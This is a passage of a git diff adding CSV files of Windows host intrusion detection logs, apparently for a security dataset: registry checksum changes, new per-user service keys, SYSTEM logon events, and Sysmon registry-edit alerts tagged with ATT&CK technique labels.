'1935e9f379e872308a49f6d8f4863bc5' +Old sha1sum was: '5c843b32b91998ce3cb955104fd52f7bf07e6d6d' +New sha1sum is : 'c9ae2d75231460ef4dab9ce1033d917d8630f141' +" +"Apr 4, 2020 @ 15:14:01.078",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:01.063",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:00.906",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:00.893",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:00.813",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:00.796",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:13:58.609",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3' was added. +" +"Apr 4, 2020 @ 15:13:58.594",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 15:13:58.563",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3\TriggerInfo\3' was added. +" +"Apr 4, 2020 @ 15:13:58.546",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 15:13:58.531",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 15:13:58.515",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 15:13:58.500",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:13:57.640",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_30ad3' was added. +" +"Apr 4, 2020 @ 15:13:57.625",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:13:57.406",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-2' checksum changed. +Old md5sum was: '60dd34472b7c4b4733f08655c4f60df2' +New md5sum is : 'cc131ed9046fdc4473415eda7dfda2bd' +Old sha1sum was: '525a1f729b820c37784c2e975a559deaf184ebb7' +New sha1sum is : '9384caab289e45a45d742e5aa407d878d3097b5a' +" +"Apr 4, 2020 @ 15:13:57.385",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '88ea2896fe72770dace71b6eb0b8a2fd' +New md5sum is : '34d7c82c5e420ab011490952e3ec24d9' +Old sha1sum was: 'c51f16862ebfdc584506948cb5fc58dc3b840250' +New sha1sum is : '88ab8d62bed217dca932dc4cb700cedfda2782c0' +" +"Apr 4, 2020 @ 15:13:57.344",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '1709748d460224dc74cfac547f6865bb' +New md5sum is : 'f99554cc3af126a43609b522296e3789' +Old sha1sum was: 'cac1e2f09b9f58972eabcf46abf587b99bb5b90a' +New sha1sum is : '79e65a0a0aa4ac842cd2db7310b55b8ce48384cf' +" +"Apr 4, 2020 @ 15:13:57.328",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1000' checksum changed. +Old md5sum was: '21c20e9307ad43dbf66b7a80761f0ae8' +New md5sum is : '3de12a32ccbd37717a2ea08417d7fddc' +Old sha1sum was: '9f188f582f1b626cd2abfc5045f67af326f52d7b' +New sha1sum is : 'b7451a316325cba8f20dce525a6e35a14bc91803' +" +"Apr 4, 2020 @ 15:13:57.312",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '5984c3fa0a124d5fa7330bf624e22205' +New md5sum is : '519c95147a332fa984f21fa352a3e6fd' +Old sha1sum was: '3fa0436b0a2334ea9bf571212d8058534fad696b' +New sha1sum is : '22be62c29307035d650978bc7ed1fcc26546a41e' +" +"Apr 4, 2020 @ 15:13:52.854",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:13:52.812",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_30ad3\Security' was added. +" diff --git a/data/MW_3_HIDS_2.csv b/data/MW_3_HIDS_2.csv new file mode 100644 index 0000000..3f595a1 --- /dev/null +++ b/data/MW_3_HIDS_2.csv @@ -0,0 +1,1555 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 24, 2020 @ 12:53:49.260",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 24, 2020 @ 12:53:46.185",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 24, 2020 @ 12:53:26.563",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 12:52:55.063",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '271f59daf9ca28fbeb0bd234897e1662' +New md5sum is : '1af7f0914012f801bdabc07119bd84db' +Old sha1sum was: 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +New sha1sum is : '98d0a499a8ec59bdfd79d0750a971a939fa5e3a2' +", +"Apr 24, 2020 @ 12:52:52.018",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '47f9a8fc035cc80b23dfd8be4d23cda6' +New md5sum is : 'ae65b80d3aa8d32f38dfcf0fd6c6b1b0' +Old sha1sum was: '592c18db00c7cbd34e9537e069e1bf1ae084bc9d' +New sha1sum is : 'bab24ad7745b947cdd2101c926f3699e6f6cbe15' +", +"Apr 24, 2020 @ 12:52:52.006",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '480a7b1436febced63b663e198db057e' +New md5sum is : '6484aaf5ea7798f1bf32f0804fa1d0bb' +Old sha1sum was: 'a366c53c7d877bd13ac0386830dbad1b52127af9' +New sha1sum is : 'fc8cbbf8be08cb003f070ba6949ee1944ad70d2d' +", +"Apr 24, 2020 @ 12:52:47.703",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3eb7b' was added. +", +"Apr 24, 2020 @ 12:52:47.672",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:46.672",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:52:46.622",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:52:39.718",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '5de781a93c0a6c5d5144068810a7e1b5' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '09d2f3723a2d55175f72d45ef9f690a25bbba0c6' +", +"Apr 24, 2020 @ 12:52:39.687",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'fc7a35e4b9cb3f1aa594dae63bcb0752' +New md5sum is : '5400df8343e80773e4544cae1af1ce7d' +Old sha1sum was: '4428ae482d529a552955f4521ecc3337d5001df3' +New sha1sum is : 'ca45b55044bf31055c2a8596696e6d8e80b45a26' +", +"Apr 24, 2020 @ 12:52:39.671",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2' +New md5sum is : '3a5e7eeb22ae3b1256b5902f59ae2551' +Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +New sha1sum is : 'a526904a4da107a226b5f13e8a032015923e3231' +", +"Apr 24, 2020 @ 12:52:38.908",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '7b25497674cc671619a3e52c5a6b72e8' +New md5sum is : 'ee77ddbee1ed560d6b349650e8349414' +Old sha1sum was: 'c42697f1b7d2dcbd8290e433e4dc2ca12090701a' +New sha1sum is : '6c5f559746b6a7a4faf287183a528aa3790a9772' +", +"Apr 24, 2020 @ 12:52:37.185",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '2e0f79c6fb4ff452e85cbf1a2d6ffc09' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'e00d4f56a725e171cace53875e2cb589d9ba1aaa' +", +"Apr 24, 2020 @ 12:52:36.899",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '73ff3da5b491b534e4f1fca73d797712' +New md5sum is : 'bd63601b6f69031fc9053f7f5e9994b3' +Old sha1sum was: '4f491ce1ca6fff4e44240d89175bfd01ac0bfaf4' +New sha1sum is : '8919a69432dd58f4818fdb4b7f15495900ea20ed' +", +"Apr 24, 2020 @ 12:52:36.624",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:52:36.608",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:36.047",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'd73c739d94aff99e2de6c480608f2631' +New md5sum is : 'aca2086634cad666bcfa5ce02c60723b' +Old sha1sum was: 'e68a929ae8dc2dda3351cb8777f4c6a4351c08c7' +New sha1sum is : '01964f5117f31b451d06a4b44965af64482e8693' +", +"Apr 24, 2020 @ 12:52:35.874",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '057b39f9a279a74ae6e39c10634a6eab' +New md5sum is : '671fdf6ae1d3621c0a477079b6ab0354' +Old sha1sum was: 'd9be4838d8b27777b7d1f01677d6ae2e41541245' +New sha1sum is : '14ea7fe43e6e733427540b1d51575677cb5e4c70' +", +"Apr 24, 2020 @ 12:52:35.439",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:52:35.407",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:35.234",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '2e0f79c6fb4ff452e85cbf1a2d6ffc09' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'e00d4f56a725e171cace53875e2cb589d9ba1aaa' +", +"Apr 24, 2020 @ 12:52:34.093",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: 'f5ea91602eb594fc2b4973f59a513fcb' +New md5sum is : '06f5c6f330af834dd08ce904d9ae7cc8' +Old sha1sum was: '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +New sha1sum is : '0cf4c4c19a1201e41b9deba273320298f4f97b50' +", +"Apr 24, 2020 @ 12:52:32.766",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'ae5aeacd0ec096e337ca3ae6a707a5ef' +New md5sum is : '5b5e36f557a71edd65caa6a11cda9191' +Old sha1sum was: 'cc73062438c2d276ae920c586c61e8046d7af96f' +New sha1sum is : '0763b6960462085ba4b95f8dd74de49818cad40f' +", +"Apr 24, 2020 @ 12:52:27.249",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +", +"Apr 24, 2020 @ 12:52:24.906",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '5689c2dd6ed61a04cc389b6099c0aea5' +New md5sum is : '6fba24441f7c19e08b81d5840e9e62af' +Old sha1sum was: '64932df77c40a56e97edb3553ce359b3aaff132e' +New sha1sum is : '915cf0aee85628bc7ab27c3b65968f0090fc5e9a' +", +"Apr 24, 2020 @ 12:52:24.812",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +", +"Apr 24, 2020 @ 12:52:24.781",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '0447d0d52ee5a830c05fbee07043f258' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : 'c52421ca8edc9b41a95e22c437b67f0f199f288a' +", +"Apr 24, 2020 @ 12:52:21.346",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:52:17.711195500Z"",""eventRecordID"":""984"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:52:17.702\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath\r\nDetails: \""C:\\Program Files (x86)\\Google\\Chrome\\Application\\81.0.4044.122\\elevation_service.exe\""\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:52:17.702"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\ImagePath"",""details"":""\\\""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\81.0.4044.122\\\\elevation_service.exe\\\""""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:52:17.702 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath +Details: ""C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.122\elevation_service.exe""""" +"Apr 24, 2020 @ 12:52:21.326",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:52:17.710283000Z"",""eventRecordID"":""983"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:52:17.702\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:52:17.702"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:52:17.702 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:52:19.044",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +", +"Apr 24, 2020 @ 12:52:16.828",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:52:16.812",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:16.376",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:52:16.359",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:16.171",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:49:13Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 12:52:14.499",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:52:14.468",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:13.985",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '774e15e7baf44381d722db864ab890d7' +New md5sum is : '50e564d651df4ed3711c530cb99d635a' +Old sha1sum was: '469daffaef7546bd68eba730d238e5592de9f468' +New sha1sum is : '9f85b67a6c52e8312f838e2577ad0927a069eeda' +", +"Apr 24, 2020 @ 12:52:11.921",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : 'fb276bc3254926295315efd699a5f0ce' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : 'b7489e940ba2819e44a06f3b6c370f25b1bd5a26' +", +"Apr 24, 2020 @ 12:52:08.092",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '71d14a2d2a756124273e36b0738f8bba' +New md5sum is : '38693b218d0d1cfbe8aa44b2759f5e0a' +Old sha1sum was: 'c605e5d23f62dcaf8235115a11a8363912e96ea2' +New sha1sum is : '7e71bd80049f0a54f2ff10b576253aee0f92597e' +", +"Apr 24, 2020 @ 12:52:07.000",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'b4bce65b22aa4a519547960a719662c4' +New md5sum is : 'f7ff7d512129b2231c517bc98c61895a' +Old sha1sum was: '3dac9d974e4d5d554b03c5e46ca8acc22b4826b6' +New sha1sum is : '8ad4b6c00e384185ef05b860966037e851115017' +", +"Apr 24, 2020 @ 12:52:06.866",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3eb7b' was added. +", +"Apr 24, 2020 @ 12:52:06.851",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3eb7b\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 12:52:06.827",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:52:02.343",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'df3256a25e140f891367ef4f45e45db2' +New md5sum is : 'b85132a0856accdaadf483c328604620' +Old sha1sum was: 'e2d4eee52f1f6550a2d64d496dfa6aa49e9a8351' +New sha1sum is : '80153a47c9a0dbd7178a3eb90d1718ccd39c8805' +", +"Apr 24, 2020 @ 12:52:00.820",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '1de56df874baf63b698941817624f3e7' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '5bae7edca7bfded5a62882384016c3e950aa6ada' +", +"Apr 24, 2020 @ 12:51:57.735",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '1f47b7195d8fed9969326bd01db47d06' +New md5sum is : '549d5493f97506ca14eb416c7cc49e4d' +Old sha1sum was: 'ee63ae916c97b341f744e3bde4a840cc48ac014b' +New sha1sum is : '48103930a75d17911b2f04f0163afdbadea50b74' +", +"Apr 24, 2020 @ 12:51:56.999",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '1de56df874baf63b698941817624f3e7' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '5bae7edca7bfded5a62882384016c3e950aa6ada' +", +"Apr 24, 2020 @ 12:51:55.874",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +", +"Apr 24, 2020 @ 12:51:46.999",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon 